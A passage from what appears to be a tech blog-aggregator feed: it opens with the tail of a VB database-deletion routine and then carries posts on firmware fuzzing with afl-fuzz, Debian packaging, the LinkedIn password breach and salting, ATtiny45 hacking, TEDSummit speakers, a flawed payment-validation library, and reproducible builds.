                            Error = DeleteSummaryTables(Conn, sJobId, "Summary_FingerMovement")
                            If Error = 0 Then
                                Error = DeleteSummaryTables(Conn, sJobID, "Summary_LiftHeights")
                                If Error = 0 Then
                                    Conn.CommitTrans
                                Else
                                    DisplayError "Error deleting record from the Summary_LiftHeights tables.", err.number, err.Description
                                    Conn.RollbackTrans
                                End If
                            Else
                                DisplayError "Error deleting record from the Summary_FingerMovement tables.", err.number, err.Description
                                Conn.RollbackTrans
                            End If
                        Else
                            DisplayError "Error deleting record from the Summary_HandToolType tables.", err.number, err.Description
                            Conn.RollbackTrans
                        End If
                    Else
                        DisplayError "Error deleting record from the Summary_Control tables.", err.number, err.Description
                        Conn.RollbackTrans
                    End If
                Else
                    DisplayError "Error deleting record from the Summary_FloorType tables.", err.number, err.Description
                    Conn.RollbackTrans
                End If
            Else
                DisplayError "Error deleting record from the Summary_Enviroment tables.", err.number, err.Description
                Conn.RollbackTrans
            End If
        Else
            DisplayError "Error deleting record from the Summary_GroundType tables.", err.number, err.Description
            Conn.RollbackTrans
        End If
    Else
        DisplayError "Error deleting record from the Summary_Grips tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
Else
    DisplayError "Error deleting record from the Summary_Grips tables.", err.number, err.Description
    Conn.RollbackTrans
End If
    Else
    DisplayError "Error deleting record from the JobHeader_WorkAReas tables.", err.number, err.Description
    Conn.RollbackTrans
    End If
    Else
        DisplayError "Error deleting record from the Tasks tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
    Else
        DisplayError "Error deleting record from the subtask tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
End If

Rondam RamblingsCould Trump be broke?

One of the big mysteries of Donald Trump's run for the White House is: why would he do it?  It seems like an awful lot of bother even for a self-aggrandizing narcissist like Trump.  And being the President is actually kind of a sucky job.  Yeah, you get a nice airplane out of it, but Trump already has a nice airplane (actually, several nice airplanes and a helicopter).  The White House would

,

Planet Linux AustraliaStewart Smith: Fuzzing Firmware – afl-fuzz + skiboot

In what is likely to be a series on how firmware makes some normal tools harder to use, first I’m going to look at american fuzzy lop – a fuzz-testing tool that, if you’re not already using it, will most certainly find bugs for you.

I first got interested in afl-fuzz during Erik de Castro Lopo’s excellent talk at linux.conf.au 2016 in Geelong earlier this year: “Fuzz all the things!”. In a previous life, the Random Query Generator managed to find a heck of a lot of bugs in MySQL (and Drizzle). For randgen info, see Philip Stoev’s talk on it from way back in 2009, a recent (2014) blog post on how Tokutek uses it and some notes on how it was being used at Oracle from 2013. Basically, the randgen was a specialized fuzzer that (given a grammar) would randomly generate SQL queries, and then (if the server didn’t crash) compare the result to some other database server (e.g. your previous version).

The afl-fuzz fuzzer takes a different approach – it’s a much more generic fuzzer rather than a targeted tool. Also, while tools such as the random query generator are extremely powerful and find specialized bugs, they’re hard to get started with. A huge benefit of afl-fuzz is that it’s really, really simple to get started with.

Basically, if you have a binary that takes input on stdin or as a (relatively small) file, afl-fuzz will just work and find bugs for you – read the Quick Start Guide and you’ll be finding bugs in no time!

For firmware of course, we’re a little different than a simple command line program as, well, we aren’t one! Luckily though, we have unit tests. These are just standard binaries that include a bunch of firmware code and get run in user space as part of “make check”. Also, just like unit tests for any project, people do send me patches that break tests (which I reject).

Some of these tests act on data we get from a place – maybe reading other parts of firmware off PNOR or interacting with data structures we get from other bits of firmware. For testing this code, it can be relatively easy (for the test) to read these off disk.

For skiboot, there’s a data structure we get from the service processor on FSP machines called HDAT. Basically, it’s just like the device tree, but different. Because yet another binary format is always a good idea (yes, that is laced with a heavy dose of sarcasm). One of the steps in early boot is to parse the HDAT data structure and convert it to a device tree. Luckily, we structured our code so that creating a unit test that can run in userspace was relatively easy, we just needed to dump this data structure out from a running machine. You can see the test case here. Basically, hdat_to_dt is a binary that reads the HDAT structure out of a pair of files and prints out a device tree. One of the regression tests we have is that we always produce the same output from the same input.
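
That sort of regression test is easy to express; here is a minimal sketch of the idea (the input and golden-output file names are placeholders, not the actual ones from the skiboot tree):

    # Minimal sketch of the "same input always gives same output" check:
    # run the converter on a captured HDAT dump and compare against a
    # previously recorded device tree.
    import subprocess

    result = subprocess.run(
        ["./hdat_to_dt", "hdat-dump-1.bin", "hdat-dump-2.bin"],
        stdout=subprocess.PIPE, check=True)

    with open("expected-device-tree.dts", "rb") as f:
        expected = f.read()

    assert result.stdout == expected, "device tree output changed!"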

So… throwing that into AFL yielded a couple of pretty simple bugs, especially around aborting out on invalid data (it’s better to exit the process with failure rather than hit an assert). Nothing too interesting here on my simple input file, but it does mean that our parsing code exits “gracefully” on invalid data.

Another utility we have is actually a userspace utility for accessing the gard records in the flash. A GARD record is a record of a piece of hardware that has been deconfigured due to a fault (or a suspected fault). Usually this utility operates on PNOR flash through /dev/mtd – but really what it’s doing is talking to the libflash library, that we also use inside skiboot (and on OpenBMC) to read/write from flash directly, via /dev/mtd or just from a file. The good news? I haven’t been able to crash this utility yet!

So I modified the pflash utility to read from a file to attempt to fuzz the partition reading code we have for the partitioning format that’s on PNOR. So far, no crashes – although to even get it going I did have to fix a bug in the file handling code in pflash, so that’s already a win!

But crashing bugs aren’t the only type of bugs – afl-fuzz has exposed several cases where we act on uninitialized data. How? Well, we run some test cases under valgrind! This is the joy of user space unit tests for firmware – valgrind becomes a tool that you can run! Unfortunately, these bugs have been sitting in my “todo” pile (which is, of course, incredibly long).

Where to next? Fuzzing the firmware calls themselves would be nice – although that’s going to require a targeted tool that knows about what to pass each of the calls. Another round of afl-fuzz running would also be good, I’ve fixed a bunch of the simple things and having a better set of starting input files would be great (and likely expose more bugs).

Planet DebianStig Sandbeck Mathisen: Puppet 4 uploaded to Debian experimental

I’ve uploaded puppet 4.4.2-1 to Debian experimental.

Please test with caution, and expect sharp corners. This is a new major version of Puppet in Debian, with many new features and potentially breaking changes, as well as a big rewrite of the .deb packaging. Bug reports for src:puppet are very welcome.

As previously described in #798636, the new package names are:

  • puppet (all the software)

  • puppet-agent (package containing just the init script and systemd unit for the puppet agent)

  • puppet-master (init script and systemd unit for starting a single master)

  • puppet-master-passenger (This package depends on apache2 and libapache2-mod-passenger, and configures a puppet master scaled for more than a handful of puppet agents)

Lots of hugs to the authors, keepers and maintainers of autopkgtest, debci, piuparts and ruby-serverspec for their software. They helped me figure out when I had reached “good enough for experimental”.

Some notes:

  • To use exported resources with puppet 4, you need a puppetdb installation and a relevant puppetdb-terminus package on your puppet master. This is not available in Debian, but is available from Puppet’s repositories.

  • Syntax highlighting for Emacs and Vim is no longer built from the puppet package. Standalone packages will be made.

  • The packaged puppet modules need an overhaul of their dependencies to install alongside this version of puppet. Testing would probably also be great to see if they actually work.

I sincerely hope someone finds this useful. :)

Sociological ImagesIs Michelle Jealous of Melania? Catty Stereotypes and Racist Cartoons

Many are aghast at a cartoon recently released by a well-known right-leaning cartoonist, Ben Garrison. Rightly, commentators are arguing that it reproduces the racist stereotype that African American women are more masculine than white women. I’ll briefly discuss this, but I want to add a twist, too.

The block versus cursive font, the muscularity and the leanness, the strong versus swishy stance, the color and cut of their dresses, the length of their hair, the confrontational versus the compliant facial expression, and the strategically placed, transphobic bulge in Michelle Obama’s dress — you could hardly do a better job of masculinizing Michelle and feminizing Melania.

This is a racist stereotype not only because it posits that black women are unattractive, unlikable, and even dangerous, but because it has its roots in American slavery. We put middle class white women on pedestals, imagining them to be fragile and precious. But if women were fragile and precious, how could we force some of them to do the hard labor we forced on enslaved women? The answer was to defeminize black women. Thanks for keeping the stereotype alive, Ben Garrison.

What I’d like to add as a twist, though, is about Michelle’s expression, purposefully drawn as both ugly and judgmental. Michelle’s face isn’t just drawn as masculine; it’s aimed at Melania, and she isn’t just sneering, she’s sneering at this other woman.

The cartoon also places women in competition. It tells a sexist story of ugly (black) women who are hateful toward beautiful (white) women. It tells a story in which women are bitter and envious of each other, a ubiquitous story in which women tear each other down and can’t get along. It’s a terrible stereotype, demeaning and untrue (except insofar as patriarchal relations make it so).

And it’s especially reprehensible when it’s layered onto race.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianJonathan McDowell: First steps with the ATtiny45

1 port USB Relay

These days the phrase “embedded” usually means no console (except, if you’re lucky, console on a UART for debugging) and probably busybox for as much of userspace as you can get away with. You possibly have package management from OpenEmbedded or similar, though it might just be a horrible kludged together rootfs if someone hates you. Either way it’s rare for it not to involve some sort of hardware and OS much more advanced than the 8 bit machines I started out programming on.

That is, unless you’re playing with Arduinos or other similar hardware. I’m currently waiting on some ESP8266 dev boards to arrive, but even they’re quite advanced, with wifi and a basic OS framework provided. A long time ago I meant to get around to playing with PICs but never managed to do so. What I realised recently was that I have a ready made USB relay board that is powered by an ATtiny45. First step was to figure out if there were suitable programming pins available, which turned out to be all brought out conveniently to the edge of the board. Next I got out my trusty Bus Pirate, installed avrdude and lo and behold:

$ avrdude -p attiny45 -c buspirate -P /dev/ttyUSB0
Attempting to initiate BusPirate binary mode...
avrdude: Paged flash write enabled.
avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9206 (probably t45)

avrdude: safemode: Fuses OK (E:FF, H:DD, L:E1)

avrdude done.  Thank you.

Perfect. I then read the existing flash image off the device, disassembled it, worked out it was based on V-USB and then proceeded to work out that the only interesting extra bit was that the relay was hanging off pin 3 on IO port B. Which led to me knocking up what I thought should be a functionally equivalent version of the firmware, available locally or on GitHub. It’s worked with my basic testing so far and has confirmed to me I understand how the board is set up, meaning I can start to think about what else I could do with it…

Planet DebianAndy Simpkins: OpenTAC sprint, Cambridge

Last weekend saw a small group get together in Cambridge to hack on the OpenTAC.  OpenTAC is an OpenHardware OpenSoftware test platform, designed specifically to aid automated testing and continuous integration.

Aimed at small / mobile / embedded targets, OpenTAC v1 provides all of the support infrastructure to drive up to 8 DUTs (Devices Under Test) from your test or CI system.
Each of the 8 EUT ports provides:

  • A serial port (either RS232 levels on a DB9 socket, or 3V3 TTL on a molex kk plug)
  • USB power (up to 2A with a software defined fuse, and alarm limits)
  • USB data interconnect
  • Ethernet

All ports on the EUT interface are relay isolated; this means that cables to your EUT can be ‘unplugged’ under software control (we are aware of several SoC development boards that latch up if there is a serial port connected before power is applied).

Additionally, there are 8 GPIO lines that can be used as switch controls for any EUT (perhaps to put a specific EUT into programming mode, reboot it, or even start it).

 

Anyway, back to the hacking weekend...

 

Joining Steve McIntyre and myself were Mark Brown and Michael Grzeschik (sorry Michael, I couldn’t find a homepage).  Mark travelled down from Scotland whilst Michael flew in from Germany for the weekend.  Gents, we greatly appreciate you taking the time and expense to join us this weekend.  I should also thank my employer, Toby Churchill Ltd., for allowing us to use the office to host the event.

A lot of work got done, and I believe we have now fully tested and debugged the hardware.  We have also made great progress with the device tree and device drivers for the platform.  Mark got the EUT power system working as a proof of concept, and has taken an OpenTAC board back with him to turn this into suitable drivers and hopefully push them upstream.  Meanwhile Michael spent his time working on the system portion of the device tree: OpenTAC’s internal power sequencing, thermal management subsystem, and USB hub control.  Steve got to grips with the USB serial converters (including how to read and program their internal non-volatile settings).  Finally, I was able to explain hardware sequencing to everyone, and to modify boards to overcome some of my design mistakes (the biggest was by far the missing sense resistors for the EUT power management).

 

 

Krebs on SecurityAs Scope of 2012 Breach Expands, LinkedIn to Again Reset Passwords for Some Users

A 2012 data breach that was thought to have exposed 6.5 million hashed passwords for LinkedIn users instead likely impacted more than 117 million accounts, the company now says. In response, the business networking giant said today that it would once again force a password reset for individual users thought to be impacted in the expanded breach.

The 2012 breach was first exposed when a hacker posted a list of some 6.5 million unique passwords to a popular forum where members volunteer or can be hired to hack complex passwords. Forum members managed to crack some of the passwords, and eventually noticed that an inordinate number of the passwords they were able to crack contained some variation of “linkedin” in them.

LinkedIn responded by forcing a password reset on all 6.5 million of the impacted accounts, but it stopped there. But earlier today, reports surfaced about a sales thread on an online cybercrime bazaar in which the seller offered to sell 117 million records stolen in the 2012 breach. In addition, the paid hacked data search engine LeakedSource claims to have a searchable copy of the 117 million record database (this service said it found my LinkedIn email address in the data cache, but it asked me to pay $4.00 for a one-day trial membership in order to view the data; I declined).

Inexplicably, LinkedIn’s response to the most recent breach is to repeat the mistake it made with original breach, by once again forcing a password reset for only a subset of its users.

“Yesterday, we became aware of an additional set of data that had just been released that claims to be email and hashed password combinations of more than 100 million LinkedIn members from that same theft in 2012,” wrote Cory Scott, in a post on the company’s blog. “We are taking immediate steps to invalidate the passwords of the accounts impacted, and we will contact those members to reset their passwords. We have no indication that this is as a result of a new security breach.”

LinkedIn spokesman Hani Durzy said the company has obtained a copy of the 117 million record database, and that LinkedIn believes it to be real.

“We believe it is from the 2012 breach,” Durzy said in an email to KrebsOnSecurity. “How many of those 117m are active and current is still being investigated.”

Regarding the decision not to force a password reset across the board back in 2012, Durzy said “We did at the time what we thought was in the best interest of our member base as a whole, trying to balance security for those with passwords that were compromised while not disrupting the LinkedIn experience for those who didn’t appear impacted.”

The 117 million figure makes sense: LinkedIn says it has more than 400 million users, but reports suggest only about 25 percent of those accounts are used monthly.

Alex Holden, co-founder of security consultancy Hold Security, was among the first to discover the original cache of 6.5 million back in 2012 — shortly after it was posted to the password cracking forum InsidePro. Holden said the 6.5 million encrypted passwords were all unique, and did not include any passwords that were simple to crack with rudimentary tools or resources [full disclosure: Holden’s site lists this author as an adviser, however I receive no compensation for that role].

“These were just the ones that the guy who posted it couldn’t crack,” Holden said. “I always thought that the hacker simply didn’t post to the forum all of the easy passwords that he could crack himself.”

The top 20 most commonly used LinkedIn account passwords, according to LeakedSource.

According to LeakedSource, just 50 easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach.

“Passwords were stored in SHA1 with no salting,” the password-selling site claims. “This is not what internet standards propose. Only 117m accounts have passwords and we suspect the remaining users registered using FaceBook or some similarity.”

SHA1 is one of several different methods for “hashing” — that is, obfuscating and storing — plain text passwords. Passwords are “hashed” by taking the plain text password and running it against a theoretically one-way mathematical algorithm that turns the user’s password into a string of gibberish numbers and letters that is supposed to be challenging to reverse. 

The weakness of this approach is that hashes by themselves are static, meaning that the password “123456,” for example, will always compute to the same password hash. To make matters worse, there are plenty of tools capable of very rapidly mapping these hashes to common dictionary words, names and phrases, which essentially negates the effectiveness of hashing. These days, computer hardware has gotten so cheap that attackers can easily and very cheaply build machines capable of computing tens of millions of possible password hashes per second for each corresponding username or email address.

But by adding a unique element, or “salt,” to each user password, database administrators can massively complicate things for attackers who may have stolen the user database and rely upon automated tools to crack user passwords.
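
The difference is easy to see in a few lines of Python; this is a sketch of the concept, not LinkedIn's actual scheme (and a real deployment would also use a deliberately slow function such as bcrypt rather than plain SHA1, but the salting point is the same):

    import hashlib, os

    # Unsalted: the same password always hashes to the same value, so one
    # precomputed table cracks every user who chose "123456".
    print(hashlib.sha1(b"123456").hexdigest())         # identical for every user

    # Salted: a random per-user value is mixed in, so identical passwords
    # produce different hashes and precomputed tables stop working.
    salt = os.urandom(16)
    print(hashlib.sha1(salt + b"123456").hexdigest())  # differs per user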

LinkedIn said it added salt to its password hashing function following the 2012 breach. But if you’re a LinkedIn user and haven’t changed your LinkedIn password since 2012, your password may not be protected with the added salting capabilities. At least, that’s my reading of the situation from LinkedIn’s 2012 post about the breach.

If you haven’t changed your LinkedIn password in a while, that would probably be a good idea. Most importantly, if you use your LinkedIn password at other sites, change those passwords to unique passwords. As this breach reminds us, re-using passwords at multiple sites that hold personal and/or financial information about you is a less-than-stellar idea.

Planet DebianSteve Kemp: Accidental data-store ..

A few months back I was looking over a lot of different object-storage systems, giving them mini-reviews, and trying them out in turn.

While many were overly complex, some were simple. Simplicity is always appealing, providing it works.

My review of camlistore was generally positive, because I like the design. Unfortunately it also highlighted a lack of documentation about how to use it to scale, replicate, and rebalance.

How hard could it be to write something similar, but also paying attention to keep it as simple as possible? Well perhaps it was too easy.

Blob-Storage

First of all we write a blob-storage system. We allow three operations to be carried out (a minimal sketch follows the list):

  • Retrieve a chunk of data, given an ID.
  • Store the given chunk of data, with the specified ID.
  • Return a list of all known IDs.
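
Here is the minimal sketch promised above; a real node would persist to disk and speak HTTP, this just shows the shape of the interface:

    # Minimal sketch of the three blob-store operations, backed by a dict.
    class BlobStore(object):
        def __init__(self):
            self._blobs = {}

        def get(self, blob_id):
            return self._blobs[blob_id]

        def put(self, blob_id, data):
            self._blobs[blob_id] = data

        def list_ids(self):
            return list(self._blobs.keys())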

 

API Server

We write a second server that consumers actually use, though it is implemented in terms of the blob-storage server listed previously.

The public API is trivial:

  • Upload a new file, returning the ID which it was stored under.
  • Retrieve a previous upload, by ID.

 

Replication Support

The previous two services are sufficient to write an object storage system, but they don't necessarily provide replication. You could add immediate replication; an upload of a file could involve writing that data to N blob-servers, but in a perfect world servers don't crash, so why not replicate in the background? You save time if you only save uploaded-content to one blob-server.

Replication can be implemented purely in terms of the blob-servers (a rough sketch follows the list):

  • For each blob server, get the list of objects stored on it.
  • Look for that object on each of the other servers. If it is found on N of them we're good.
  • If there are fewer copies than we like, then download the data, and upload to another server.
  • Repeat until each object is stored on a sufficient number of blob-servers.
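
And a sketch of that background pass, expressed against the BlobStore interface sketched earlier; MIN_COPIES is an assumed replication target, not a value from the real project:

    # Minimal sketch of one background replication pass.
    import random

    MIN_COPIES = 2

    def replicate(servers):
        for server in servers:
            for blob_id in server.list_ids():
                holders = [s for s in servers if blob_id in s.list_ids()]
                if len(holders) >= MIN_COPIES:
                    continue                      # enough copies already
                data = server.get(blob_id)
                spare = [s for s in servers if s not in holders]
                while spare and len(holders) < MIN_COPIES:
                    target = spare.pop(random.randrange(len(spare)))
                    target.put(blob_id, data)
                    holders.append(target)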

 

My code is reliable, the implementation is almost painfully simple, and the only difference in my design is that rather than having an API-server which allows both "uploads" and "downloads" I split it into two - that means you can leave your "download" server open to the world, so that it can be useful, and your upload-server can be firewalled to only allow a few hosts to access it.

The code is perl-based, because Perl is good, and available here on github:

TODO: Rewrite the thing in #golang to be cool.

TEDMeet the 110 speakers at TEDSummit 2016 (including some of the most popular of all time)

TEDSummit logo

The number is 110: One hundred and ten past and new TED speakers are part of our newest conference, TEDSummit, happening in Banff, Canada, 26–30 June 2016.

And you are invited to join us!

Some of the most popular TED speakers of all time, including Dan Pink, David Gallo, Esther Perel, Kelly and Jane McGonigal, Pico Iyer and dozens more will be joined by brand-new voices including food innovator Josh Tetrick, forest biologist Suzanne Simard, environmental writer Emma Marris, energy experts Joe Lassiter and Michael Shellenberger, blockchain researcher Bettina Warburg, global affairs writer Jonathan Tepperman, empathy scientist Abigail Marsh and more.

About half of these speakers will take the stage to give major TED Talks on topics ranging from advanced digital technologies to climate change to surveillance and transparency … from relationships to brain microscopy … from trust to what humans might look like in 200 years

These 110 speakers will also join — and often lead — workshops and participatory sessions. Look, among the more than 100 sessions, for workshops on the ethics of artificial intelligence, and on the fragility of global megacities … brainstorms on what the TED community might do to help confront the refugee crisis, or on the idea of a female utopia … master classes on social storytelling and on how to think like a scientist … a walk in the woods guided by a forest biologist … even a hands-on genetic manipulation lab.

And there will be planned and unplanned surprises, and of course, outdoor activities in the gorgeous scenery of the Canadian Rocky Mountains.

There are a few seats left to attend TEDSummit. You can find more information and apply here.

And here is the full list of past and new TED speakers who have confirmed their participation in TEDSummit 2016 (subject to change):

Alessandro Acquisti, Privacy economist
Esra’a Al Shafei, Human rights activist
Monica Araya, Activist
Tasso Azevedo, Forester, sustainability activist
Julia Bacha, Filmmaker
Uldus Bakhtiozina, Photographer, visual artist
Benedetta Berti, International policy analyst
Alexander Betts, Refugee scholar
Laila Biali, Musician
Rachel Botsman, Sharing innovator
Laura Boushnak, Photographer
Ed Boyden, Neuroengineer
Steve Boyes, Explorer
Jennifer Bréa, Filmmaker
Erik Brynjolfsson, Innovation researcher
Kitra Cahana, Journalist and conceptual artist
Daniela Candillari, Musician
Jason Clay, Market transformer
Angélica Dass, Photographer
Abe Davis, Computer scientist
Dan Dennett, Philosopher, cognitive scientist
Jamie Drummond, Anti-poverty activist
R. Luke DuBois, Artist, composer, engineer
Zak Ebrahim, Peace activist
Hasan Elahi, Privacy artist
Juan Enriquez, Futurist
Helen Fisher, Anthropologist; expert on love
Melissa Fleming, Voice for refugees
David Gallo, Oceanographer
Casey Gerald, American
Anand Giridharadas, Author
Michael Green, Social progress expert
Michael Green, Architect
Brian Greene, Physicist
Johann Hari, Journalist
Sam Harris, Neuroscientist and philosopher
Gary Haugen, Human rights attorney
Lesley Hazleton, Accidental theologist
Celeste Headlee, Writer and radio host
Margaret Heffernan, Management thinker
Hugh Herr, Bionics designer
Erik Hersman, Blogger, technologist
Hays + Ryan Holladay, Musical artists
John Hunter, Educator
Jedidah Isler, Astrophysicist
Pico Iyer, Global author
Meg Jay, Clinical psychologist
Ellen Jorgensen, Biologist and community science advocate
Sarah Kay, Poet
Kevin Kelly, Digital visionary
Matt Kenyon, New media artist
Ken Lacovara, Paleontologist
David Lang, Maker
Joe Lassiter, Energy scholar
Tim Leberecht, Marketer
Monica Lewinsky, Social activist
Rebecca MacKinnon, Media activist
Pia Mancini, Democracy activist
Emma Marris, Environmental writer
Abigail Marsh, Psychologist
Jane McGonigal, Game designer
Kelly McGonigal, Health psychologist
Lee Mokobe, Poet
Robert Muggah, Megacities expert
Michael Murphy, Designer
Ethan Nadelmann, Drug policy reformer
Iyeoka Okoawo, Singer
Ngozi Okonjo-Iweala, Economist
Dan Pallotta, Charity defender
Amanda Palmer, Musician
Sarah Parcak, Space archaeologist, TED Prize winner
Eli Pariser, Organizer and author
Vikram Patel, Mental health care advocate
Esther Perel, Relationship therapist
Dan Pink, Career analyst
Will Potter, Investigative journalist
Navi Radjou, Innovation strategist
Shai Reshef, Education entrepreneur
Usman Riaz, Percussive guitarist
Joshua Roman, Cellist
Jon Ronson, Writer and filmmaker
Martine Rothblatt, Transhumanist
Juliana Rotich, Tech entrepreneur
Louie Schwartzberg, Filmmaker
eL Seed, Calligraffiti artist
Bill Sellanga, Musician
Graham Shaw, Communication coach
Michael Shellenberger, Climate policy expert
Michael Shermer, Skeptic
Suzanne Simard, Forest biologist
Ernesto Sirolli, Sustainable development expert
Kevin Slavin, Algoworld expert
Christopher Soghoian, Privacy researcher + activist
Andrew Solomon, Writer
Malte Spitz, Politician and data activist
Daniel Suarez, Sci-fi author
Pavan Sukhdev, Environmental economist
Ilona Szabo de Carvalho, Policy reformer
Don Tapscott, Digital strategist
Anastasia Taylor-Lind, Documentary photographer
Marco Tempest, Techno-illusionist
Jonathan Tepperman, Editor, Foreign Affairs
Josh Tetrick, Food innovator
Julian Treasure, Sound consultant
Zeynep Tufekci, Techno-sociologist
Sherry Turkle, Cultural analyst
James Veitch, Comedian and writer
Robert Waldinger, Psychiatrist, psychoanalyst and Zen priest
Bettina Warburg, Blockchain researcher


Krebs on SecurityMicrosoft Disables Wi-Fi Sense on Windows 10

Microsoft has disabled its controversial Wi-Fi Sense feature, a component embedded in Windows 10 devices that shares access to WiFi networks to which you connect with any contacts you may have listed in Outlook and Skype — and, with an opt-in — your Facebook friends.

Redmond made the announcement almost as a footnote in its Windows 10 Experience blog, but the feature caused quite a stir when the company’s flagship operating system first debuted last summer.

Microsoft didn’t mention the privacy and security concerns raised by Wi-Fi Sense, saying only that the feature was being removed because it was expensive to maintain and that few Windows 10 users were taking advantage of it.

“We have removed the Wi-Fi Sense feature that allows you to share Wi-Fi networks with your contacts and to be automatically connected to networks shared by your contacts,” wrote Gabe Aul, corporate vice president of Microsoft’s engineering systems team. “The cost of updating the code to keep this feature working combined with low usage and low demand made this not worth further investment. Wi-Fi Sense, if enabled, will continue to get you connected to open Wi-Fi hotspots that it knows about through crowdsourcing.”

Wi-Fi Sense doesn’t share your WiFi network password per se — it shares an encrypted version of that password. But it does allow anyone in your Skype or Outlook or Hotmail contacts lists to waltz onto your Wi-Fi network — should they ever wander within range of it or visit your home (or hop onto it secretly from hundreds of yards away with a good ‘ole cantenna!).

When the feature first launched, Microsoft sought to reassure would-be Windows 10 users that their Wi-Fi password would be sent encrypted and stored encrypted — on a Microsoft server. The company also pointed out that Windows 10 users had to initially agree to share their network during the Windows 10 installation process before the feature would be turned on.

But these assurances rang hollow for many Windows users already suspicious about a feature that could share access to a user’s wireless network even after that user changed their Wi-Fi network password.

“Annoyingly, because they didn’t have your actual password, just authorization to ask the Wi-Fi Sense service to supply it on their behalf, changing your password down the line wouldn’t keep them out – Wi-Fi Sense would learn the new password directly from you and supply it for them in future,” John Zorabedian wrote for security firm Sophos.

Microsoft’s solution for those concerned required users to change the name (a.k.a. “SSID“) of their Wi-Fi network to include the text “_optout” somewhere in the network name (for example, “oldnetworknamehere_optout”).

I commend Microsoft for taking this step, albeit belatedly. Much security is undone by ill-advised features in software and hardware that are unnecessarily enabled by default.

Worse Than FailureUnprocessed Payments

Ivan worked for a mobile games company that mass-produced “freemium” games. These are the kinds of games you download and play for free, but you can pay for in-game items or perks to make the game easier–or in some cases, possible to beat once you get about halfway through the game.

Since that entire genre is dependent upon microtransactions, you’d think developers would have rock-solid payment code that rarely failed. Code that worked almost all the time, that was nearly unhackable, and would provide a steady stream of microtransactions to pay everybody’s salary. But who am I kidding? This is The Daily WTF! Of course reliable in-app payment code for a company completely dependent on microtransactions isn’t going to happen!

Ivan found himself debugging the company’s core payment library, originally written by a developer named Hanlon who happened to have a PhD in Astrophysics. Hanlon still worked for the company but had moved on to other roles. However, he reported a bug that Ivan had to fix. The payment library would never report PaymentValidationResult.Success, only PaymentValidationResult.Error. In-app purchases were completely broken, across their entire library of released freemium games, and this was obviously unacceptable.

Ivan went spelunking but quickly found that the payment web service did indeed return PaymentValidationResult.Success when a microtransaction was successful. So what was the client-side library doing wrong? He opened that project up and found this:

    PaymentResponse response = _networking.SendRequest(request);
    PaymentValidationResult result = PaymentValidationResult.Success;
    if (response.StatusCode.Is(400))
    {
        result = PaymentValidationResult.Failure;
    }
    else if (response.HasError())
    {
        result = PaymentValidationResult.Error;
    }

    return result;

It assumes from the start that the payment was successful, and only returns an error if the server response explicitly says something bad happened. In the case of timeouts, corruption, or other network errors when a server response is not received, this library would actually report to the application that the microtransaction succeeded, and the player could get free stuff!

But this doesn’t explain why it always failed.

He decided to peek at the response.HasError() function.

    public bool HasError()
    {
        bool hasError = true;

        if (BodyString != null)
        {
            var body = ParseBody();
            if (body != null)
            {
                hasError = body["error_message"] != null;
            }
        }

        return hasError;
    }

This function kind of does the opposite. It assumes an error has always occurred, and then validates and changes its mind if it finds proof that no error occurred. For this to happen, the response it receives from the server must contain a JSON document that does not have an “error_message” key.

Upon re-examining the server-side code, Ivan found that the server simply returns an HTTP status code to indicate payment status, with values of 400 or more indicating error (e.g. 401 = “validation info missing from request”, 402 = “no information retrieved from app store”, 200 = “all good!”). It doesn’t issue any kind of JSON document. Ever. The client code always failed because BodyString was always null.

That’s right, the core business-critical microtransaction library used in all of the company’s freemium games was incapable of actually handling a microtransaction!

Ivan rewrote the PaymentResponse.HasError() function to look like this:

    public bool HasError()
    {
        int responseCode = (int)StatusCode;
        return responseCode >= 400;
    }

They pushed this fix out to the entire company and all its products, issued rounds of updates to the various mobile app stores, and the company started making money, presumably for the first time ever.


Planet DebianBits from Debian: Imagination accelerates Debian development for 64-bit MIPS CPUs

Imagination Technologies recently donated several high-performance SDNA-7130 appliances to the Debian Project for the development and maintenance of the MIPS ports.

The SDNA-7130 (Software Defined Network Appliance) platforms are developed by Rhino Labs, a leading provider of high-performance data security, networking, and data infrastructure solutions.

With these new devices, the Debian project will have access to a wide range of 32- and 64-bit MIPS-based platforms.

Debian MIPS ports are also possible thanks to donations from the aql hosting service provider, the Eaton remote controlled ePDU, and many other individual members of the Debian community.

The Debian project would like to thank Imagination, Rhino Labs and aql for this coordinated donation.

More details about GNU/Linux for MIPS CPUs can be found in the related press release at Imagination and their community site about MIPS.

,

Planet DebianReproducible builds folks: Reproducible builds: week 55 in Stretch cycle

What happened in the Reproducible Builds effort between May 8th and May 14th 2016:

Documentation updates

Toolchain fixes

  • dpkg 1.18.7 has been uploaded to unstable, after which Mattia Rizzolo took care of rebasing our patched version.
  • gcc-5 and gcc-6 migrated to testing with the patch to honour SOURCE_DATE_EPOCH
  • Ximin Luo started an upstream discussion with the Ghostscript developers.
  • Norbert Preining has uploaded a new version of texlive-bin with these changes relevant to us:
    • imported Upstream version 2016.20160512.41045 support for suppressing timestamps (SOURCE_DATE_EPOCH) (Closes: #792202)
    • add support for SOURCE_DATE_EPOCH also to luatex
  • cdbs 0.4.131 has been uploaded to unstable by Jonas Smedegaard, fixing these issues relevant to us:
    • #794241: export SOURCE_DATE_EPOCH. Original patch by akira
    • #764478: call dh_strip_nondeterminism if available. Original patch by Holger Levsen
  • libxslt 1.1.28-3 has been uploaded to unstable by Mattia Rizzolo, fixing the following toolchain issues:
    • #823857: backport patch from upstream to provide stable IDs in the generated documents.
    • #791815: Honour SOURCE_DATE_EPOCH when embedding timestamps in docs. Patch by Eduard Sanou.

Packages fixed

The following 28 packages have become newly reproducible due to changes in their build dependencies: actor-framework ask asterisk-prompt-fr-armelle asterisk-prompt-fr-proformatique coccinelle cwebx d-itg device-tree-compiler flann fortunes-es idlastro jabref konclude latexdiff libint minlog modplugtools mummer mwrap mxallowd mysql-mmm ocaml-atd ocamlviz postbooks pycorrfit pyscanfcs python-pcs weka

The following 9 packages had older versions which were reproducible, and their latest versions are now reproducible again due to changes in their build dependencies: csync2 dune-common dune-localfunctions libcommons-jxpath-java libcommons-logging-java libstax-java libyanfs-java python-daemon yacas

The following packages have become newly reproducible after being fixed:

The following packages had older versions which were reproducible, and their latest versions are now reproducible again after being fixed:

  • klibc/2.0.4-9 by Ben Hutchings.

Some uploads have fixed some reproducibility issues, but not all of them:

